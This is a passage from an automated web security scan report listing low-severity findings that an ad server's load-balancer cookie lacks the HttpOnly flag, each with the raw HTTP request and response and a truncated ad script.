Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4572
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2114966338/Middle
...[SNIP]...

14.369. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1701891140@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1701891140@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1701891140@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4573
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1171614213/Middle
...[SNIP]...

14.370. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1730151269@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1730151269@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1730151269@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4326
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1627003568/Middle
...[SNIP]...

14.371. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1739497285@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1739497285@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1739497285@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4860
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238822780/Middle/
...[SNIP]...

14.372. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1745603517@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1745603517@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1745603517@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4565
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/534073732/Middle/
...[SNIP]...

14.373. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1747984898@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1747984898@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1747984898@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:00:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4267
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/11037586/Middle/D
...[SNIP]...

14.374. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1753370563@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1753370563@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1753370563@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4614
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/747020510/Middle/
...[SNIP]...

14.375. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1761257569@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1761257569@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1761257569@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4565
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/441611668/Middle/
...[SNIP]...

14.376. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1766138964@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1766138964@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1766138964@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:52:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4800
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1276661447/Middle
...[SNIP]...

14.377. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1773027326@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1773027326@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1773027326@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4328
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/276208829/Middle/
...[SNIP]...

14.378. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1786991815@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1786991815@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1786991815@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4865
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/969651754/Middle/
...[SNIP]...

14.379. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1791676588@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1791676588@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1791676588@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4536
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/215617663/Middle/
...[SNIP]...

14.380. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1804055224@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1804055224@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1804055224@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4267
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/244718376/Middle/
...[SNIP]...

14.381. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1807334164@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1807334164@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1807334164@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4573
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1360676709/Middle
...[SNIP]...

14.382. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1828813500@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1828813500@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1828813500@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:00:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4803
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1946293802/Middle
...[SNIP]...

14.383. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829726854@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829726854@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829726854@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
